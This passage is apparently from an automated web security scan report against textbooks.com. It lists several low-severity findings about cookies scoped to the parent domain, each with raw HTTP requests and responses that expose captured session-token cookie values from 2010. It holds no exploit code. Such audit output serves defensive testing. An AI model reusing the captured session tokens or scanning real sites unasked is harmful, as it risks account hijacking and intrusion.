swvPk5KYoxjtZ2le%2FPw%2BVXot6ByHfv%2FDwy5m5lf6h5WLD%2BHIiXaTS6mr30ISUba34baGYm0EXzmo%2Bxpy73LARAWIIM8rLdxX%2BOlvvRYYjayWKApEY9kRkNSQFGtCnTTPZ%2Bz1kdD9o0gvjv8y0SWCSTN2bBl7F30PmpNGu5vgPi7vcMsAoISW2OiA2Iuog4j5Rxzm7Yjhg5GXlAzI%2BSXK9WI6clxDFUD1RkSWm2D0CZKO83%2BWP5BJ8zoMPMM2fdMJOIzdYEWPoJEgD1nO%2BOrZrqKIbbRGvFZY%2F7LF0z6uZyz%2BSLGgYtqi0%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=ypV4xbizAJKCvg8uCNg%3D; expires=Mon, 26-Dec-2011 13:52:08 GMT; path=/; domain=.textbooks.com
Content-Length: 122719


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.9. http://www.textbooks.com/Catalog/D/Computer-Science-and-Technology.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/D/Computer-Science-and-Technology.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/D/Computer-Science-and-Technology.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=RtCUsbWXaFR47MNWPWHOzPcmR78poiHZjG7hDxh7QODVdNiT0%2FgnZ98hCqLh7wT9sDekHYtZF%2BwOIfrndsIMeQSDgDPcWbJF9puHQxEa6%2BitYnwan4YS%2FvP7UzwbH%2B2tMpGeGyOmWGv6%2BEOj8vihwI2MrJKUAULzP03b2fAeY7mTFQRQO1meIcgqIwr4x81VQwUR6Peqv6A%2FmYHiBf4HV3PFOZB%2BBiEKNLSRYdiRikFZB0Qjz58nLotkTytGq5lMmcHSx2D9n%2BlTV4Yi%2BQVQzsxLPIGEPrf7AdYh%2BDzuqpLg%2BnpWAXkJVSoQ0tnhvMmqVdnc8O0J%2BMEjDIyUriloigVUhNoty2m7L8tZMQykQRMxxifyi7VH4vM%2FEN4QUSvZpizcCfGKZQQRQwdyTQ19QVxz1p%2BV7U4%2FFn18CiISYeoJYlkJ93KaU88UkUEdKfVMVsf8jSpalZsEqCnX8MjAInoflORDE2NfnghY%2BMVz0tyRmaYXXo6CzRW20AnegvjjrXYCZfpFx2OJPzn4ct7MyUCh3gPOi2wdOcGjkG3OboZdX28ux7lIg0dTOu%2BAI3B28DUHw11eZ1cWfPelg3dHyaoetrpvnMbPI7gADHXiX909SEJY3oR0%2FQi6NZN9uaE51a5Ejjl5NZnfGZLEl7JeO7NTV%2F24Pqd%2BGbBjI8okC9xle6OnRbj0nolHzBgnJIvcj8m2TWNU9h87d6M%2FGdKDYi2i0KCpw9%2BBioCIasHoqfhJAzaUgZ2r8Uj2PIEMtGWNs5nZkPlHMvOxd0ObSZTJLyMW0M8IHUVoYLq%2FYWFeUP9VBnR0uTlqS5Feil%2B%2F2gieTTgQHSaCwK8IAWSTWr8uF5wGxJM%2FI3zruPwXAGf3Lkghr3ZwHI6Mlk%2BrQ4wMTicYC%2FYpFYaEztQf5bkaDbb0Xb5voEGInwWxmyt10dmD33Ngdapiq6h0VqcltGHBsCHOI9XgQ1DCBBqoOC64FfPQWBwheQkuY104mXfwXjwBh7Z75ifIj%2F9Dexa9lxyQDa6A%2BnrkNUhIFg1btmhOVziLgsDmmQOfPtYffSDnBpvGQGQBAmW2RgNKLkXXoJcVPburDXBmkxZNRHmwLKqH5k8DWhbfwgv6gDdOOBebqdbfwkGL02KMNXS8TDFMF6bzCnMfCqHaVeMlABDRdfCUzfeEMT8N%2BIHq77PK7fTKrHzsBx1JnjId9FT3NOmVy3UC%2FQfHBZvFFPmpiBP6VvfUDXLDuD%2BTWMXwseiTH4DuYDXrcgD15pGocCqojnb%2F0z4%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=qg3kYe9q6PN%2FD6c8q%2FY%3D; expires=Mon, 26-Dec-2011 13:52:11 GMT; path=/; domain=.textbooks.com
Content-Length: 126483


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.10. http://www.textbooks.com/Catalog/E/Education.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/E/Education.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/E/Education.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=%2BQT15syJFQpHp4dFG2eEpo5qhhxrN2NnXXojj%2B6vsjDlYwicebgGKOemaZwFuSpLGvERyDHJVrsOrpxCJqN516%2BVeigWN4CS52D%2ByFKeR9WqZXy2L93y1y0TTO%2FL02RMH3uE%2BkLM%2BDcTNSUgBGZyH95BMfWeoAzQs84E%2FN7tGPt7Fo0%2FhGQXKH0Q4G6Cwsv%2FNG7Ob7nyAy35Uay7WCIeTwknULTbN%2FHUrk0hmZi4EPkDKYy2miATcF2at%2FEsSO%2Fh1aVHxX2bKd5JenPNus0Tz0rHunwBvQRiIvOgX7KZdX%2BHieokPD%2BoevYGCabIOYnf47QzxWcbpCDnFVy%2BsRuNSNs3mMqT7k874RW0eZjFlmWEhBugfSwAR4nkFAXDQRZNqh8j9pZRXUOQCkFmQlEYrtJvrHZn0zj3uD9xH3sYcfy%2BSWUA%2FuGBxR9sNfqptweYYHDl4BY%2FVFhp97YXQ8Droky5fLCjVzc9xQrg82zPbc4tFVr1dLHFnDWamU6K1S0SrMwg%2FxYhK6Sx9yFUWsJRaFoj3Qn%2F80uOExnjGTTjcTd5qeqIdtxeTXDrc4PW7jrbB1%2BQf2Wpl8ja6dfhfhivhkSzKz5N55%2FOhwjl%2F7YXkfLIXv7QPZaDNaq3SASKNJBu1xaXoSdAp9zM%2B8WmxFGTHyb7BpSbx5gMxFsiMkQV%2FL5Le3M%2FaafjDNA8PJq7Z99F6Zw%2BnpQcZhZQoEarCEvnS9ZfOWQAxvEQ4RweR3i89Bba0LaEFdXa5WCAIuVwBg4mfSyjTfZQt1tIGM1q9m7ysaQqTNXIvivO4J1ILWGGHSgR5b34W20AWIBqC0%2B896S7nEXQzjMQA%2BEXtjQEO7k0UHW7YgbhQ345%2BIQilKuOxIJ9ifPgdJ2RpatlyzzW0x2CpA5BDE20evC4XQ1eO8uzlhKeXahsVWmYCDdp8mHm4Bb0hIMR5NSuZ7hD141zoqZ9fybUepYslfVHvcBsV%2F%2BEKepgQk3TpdEK4n26hoYBrZhR%2FpQ5GT3zgqiLdc5hldzuMLsT4%2Fmo9k%2BNZwqUZxXImfhbYAeIxadx0stzmiEdhIk9NRByVIv%2Bo%2B3zRlm5GS8DnsafkElC00Kyts9uRmQJjcwB8ELdqqD8jOy33w%2Fix6Spz%2FA5y2ziEUpkiomtan%2ByRTsRv7Cuz3Plqgqc%2FSIupUZ33THHanyIBH7T9%2FkPdgiTn1xA7gaYMSFCFIBgz%2Bim29x9J6B9UikJiji9arLw8%2F2p2jlGL0iFJUNVpZBaKDSXyul5fL8M9wruriM%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=VAA7TauIvNb3MpIV8EI%3D; expires=Mon, 26-Dec-2011 13:52:11 GMT; path=/; domain=.textbooks.com
Content-Length: 151328


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.11. http://www.textbooks.com/Catalog/G/History-and-Geography.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/G/History-and-Geography.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/G/History-and-Geography.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=u4V8YIRyYL1qO4cc8fpVBN8aXViG6zrMpu4wwzHQO52nr75S18JR3wKQDG%2F6HdqSbW4QUkr6KiMnTT4MmbRKlUQSFjq6uU3fuHi%2F%2F%2B1nt5MYKWVtEeGH8W2wV4XngH%2Ff4lGCyucp6LeVoYeLEofcQA8ORsuJ4%2BZlAMCevKHfwXSIBMuwcAG1G6rc8mX5srtdVcxAbu2Pvhoy%2BAr0sCOSeF5KF5Q54NDD66XMH7Y3YkmzCl4frseROWYqKlQIgkD1kJpaSayC2LcLtT1lZNhwIx%2FuaGnlhmC0s5sdvU66mrNOgAb50i9UDyDhtKUpqZxrF6oFkYLy1HiWoFx%2FhIrHwtR4WPgJFjC6UhOli9xNtmX3A6oqHGg%2FOuQv8USiVnjCgMTH3DgWXMUxjk1Ey9VgyIVJIMXQszvslZZ8c270r1Adqb%2FAtxDq0A6wHTf8n3PDxyOm1m%2BjbwSIIvfqAk3mSwHKKmRUxaRBpHr81XujCMTywdm9dCPL%2F0dEIKvQI0WJqDyAaglAAlbrthQfdIy9XKLroe9up673OqxDIgzlk7s5sKttSe8TH6zVmVU7UqU7hDeCBxUuLdxI9vXbqVZc2Fi7UMGO37sYeDZOxZdn4k%2Bt04W%2FN2XAskn%2Fnvw7m1ad6DDJ9H8%2FCZYIkykJNGBhg6dwezBCGDofHtcbcF3Ehqb1EIH5Y628zbdHjQAIzsWfKVg8910UAqVKx3FAQ1HxBGWu1p6fbO8ndZFdZBB%2FxRaJP6EdY0l48AOFB%2FgoZWmBej9U%2FYUL1lgF7B87JI%2FUO9%2F2Ri1ZAB9ENerR9zTLfGx7plZOUxM9cY5r96eYdqckWAi5inVnfyr9OAHoqvbEBrSg76ev9bg3bd7eELRwL9ZvrBxDrW9XKM41kzvvWzTLnlaIuMGgRT4gHTAl0h0dgylxaCwTzgdD0vIkDr9man%2FDvb1ehOIWMlhIGIz3MGb8WpYNNAMTX4r3MUO7AVfRzCL4haFO8M2ZdTDrz7Quii7Jf1h2irNSWvMSKj71pA7kVeQV%2FgAHLKsO%2B89PsBn4WC80sJWEsYVbn32qVgmh%2BoG%2BGf1FfTXkQ2lsUO%2FRGds6G0xpXtg54cIBUT8hiw0h26dhQnukxU0GOD2Z%2F%2BPiEf9SB2m3qjcN31ldmJlWTRqbHmSPvLZ9HTaJoqXCEw3FV7lXDFn5bX9SALvMeadgshk27xxwvii2z3PQDJYqIkD1RqBGOLY14ZLiE6Y2ga4ySSogX9FhoPWy9b90UQ%2FIyhoi6SzJZ7hjRqilfBU%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=2BZ3dFHzZbVUm9u%2FkwQ%3D; expires=Mon, 26-Dec-2011 13:52:13 GMT; path=/; domain=.textbooks.com
Content-Length: 140644


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.12. http://www.textbooks.com/Catalog/H/Arts-and-Humanities.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/H/Arts-and-Humanities.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/H/Arts-and-Humanities.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=6V6EGlHQRxeAYbzR8BD2Ib8Qdgrfw3njQmVZvpDHAaePV5%2FK6uG%2FoYHwgrYH0NbA9YRZXSWe55LoQiGKWi6KqREPPF5DwHlcNi0m8TGz7jleQcL1fsofYmMDSkhAFxwpaU9BcRoL9Jk1AVRjFpDF8%2FoOMwuoSxLWC%2FwknQLEuqHx3PvBbhFhGpgCqJWIe0Wr258LN%2BtKQtawmWP9xBvwGVYxaTTa3EzQMFIAwUZWhtpdV12HX0olp4YHSbETuruOWeL8f2HaAAFn1wKokujAsqh103pve0%2BqC44alxL549tkMvLkemBBX9XXudTrpZ3FidTlw8BdPh1HXyDBT6%2FhdF5uObdhNuxLVgHtP5WjjJVbCaGLR%2FVJeYRqG3hpEpeeJZN72hde4v1qVSht5U6MW6FpgoA22Usf1TIRfeAtlbdPEmXvshzsrybaMPdk70JZCQRC6Hp%2FgegUvLoDUmbgLWLzHX5XFcWOjK1w8qGasIh54wf3tC9iZ1YOvLGNCbdIIrjbj3hZeVB3pExWYPLkLnnbmMQixT9VbfrmiJuzUZyi7saFXFOQDx8fLGlMJecKi55%2BNv5IFXAP5XcHu%2FKFOYEpFB%2Ft0bIbAVb3mtdsuqESLdRFJRKpXxJ72pnceOt0koeUeG%2B0xchjjdc0WU894eTtzhi1GltfGgx7xa5W9McPSyLRnxsV0UeOiwdphcZfQXOV19efAzNtwZNeW%2FMm3T1GS64zIf403O%2FhgJ306hHrFKOmPd%2F5rS3fsbHJBTc6ViWCckTG04YXCuKqMBoANsW5FGN8u%2BjPUXRZiZ%2B92Mv61N7KDqOzYec6w0W4UvTwLoYPZ%2FQZYwQ5Jb9FPAZG4wvonVHgzXUsjsxWbZc4mS7IDQsSoEBp2UqOCs1nTNuYMKwctmQHCCqThti8nZWzFlXhOnZo8v7BDfAo%2BSRo1SO6fYDMZhCqgp0zgVIAFKIVwnc6nstSFDJt7DexP6XBQHJ9jU6FUEIxzFRzm3bEBU4rBtGhdCDB1oT2zzP%2BZ0uWl5N5GmBsUqfBo2Plmoj9i%2Bg2%2FlBXFffXn55MOhLfr9APP2MfUIVDuQeTOz6KBcJbFaF2lWoiqaRPyIddpxu1mRwQbrZrQHxeyz3gx%2Fn%2FksVaubH%2Bpb9K0JfRxlFSK%2B0XCeLVMY3lF8VhhTPNzCC0hKkOqb3Mm3umEziRmXy%2FkHgx%2BRFEpbjbaDZy16xInpJlSgQymNz5Ig64Z6J%2BMmyqciEwyrCt61VtFRAqXto3MGZ7tsHD0FW1aZnZIyQ%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=DCFkgYROO8MBmmRupNk%3D; expires=Mon, 26-Dec-2011 13:52:02 GMT; path=/; domain=.textbooks.com
Content-Length: 107266


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.13. http://www.textbooks.com/Catalog/HQL/General-Video-Titles.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/HQL/General-Video-Titles.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/HQL/General-Video-Titles.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
